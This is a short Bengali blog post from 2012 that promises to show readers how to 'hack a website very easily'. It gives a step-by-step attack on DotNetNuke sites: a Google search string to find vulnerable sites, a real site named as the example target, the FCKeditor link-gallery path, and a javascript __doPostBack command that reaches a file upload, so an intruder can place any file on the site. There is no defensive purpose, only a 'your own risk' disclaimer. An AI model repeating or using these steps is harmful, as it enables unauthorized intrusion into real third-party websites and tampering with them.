Friday 23 March 2012

হ্যাক করুন ওয়েবসাইট খুব সহজে !

আজ আমি আপনাদের কে দেখাবো কিবাবে খুব সহজে একটা ওয়েবসাইট হ্যাক করবেন!!
এই পোস্ট টি আগে কেও দেয়াচিল নাকি আমি জানি না!! তাই যদি কেও আগে এই পোস্ট টি করলে আমাকে ক্ষমা করবেন!
আচ্ছা কাজে আসি !
১ম এ আপনি google.com এ যান!

  • তারপর :inurl:/tabid/36/language/en-US/Default.aspx এই টা সার্চ করেন!
  • তারপর আপনি ছবির মত অনেক সাইট দেখতে পারবেন!

  • আমি  http://www.odebayi.com সাইট টা নিলাম হ্যাক করার জন্য
  • আপনি এই সাইট গুলু তে ভিসিত করলে http://www.odebayi.com/Home/tabid/36/language/en-US/Default.aspx এড্রেস বার এ টিক এই রকম দেখাবে!!
  • আপনি  /Home/tabid/36/language/en-US/Default.aspx এই রেখা টাকে মুছে এই টা লাগিয়ে দিন /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
  • আপনি এখন সাইট টার গ্যালারি রুম এ !

  • তারপর আপনি আপনার এড্রেস বার এ  javascript:__doPostBack(‘ctlURL$cmdUpload’,”)    এই কোড টি বসিয়ে এন্টার চাপুন!
  • তারপর আপনি আপনার ইচ্ছা মত সাইট টাতে ছবি,ফাইল ইত্যাদি  উপ্লয়াদ করেন!!

এই হ্যাক এর দাইভার আমি বা এডমিন নিবে না!

DO THAT YOUR OWN RISK!
ভাল থাকুন!



প্রতিটি Link এ Click করে 5 second Wait করেন । তারপর ডানদিকের উপরের ad skip তে click করুন।

No comments:

Post a Comment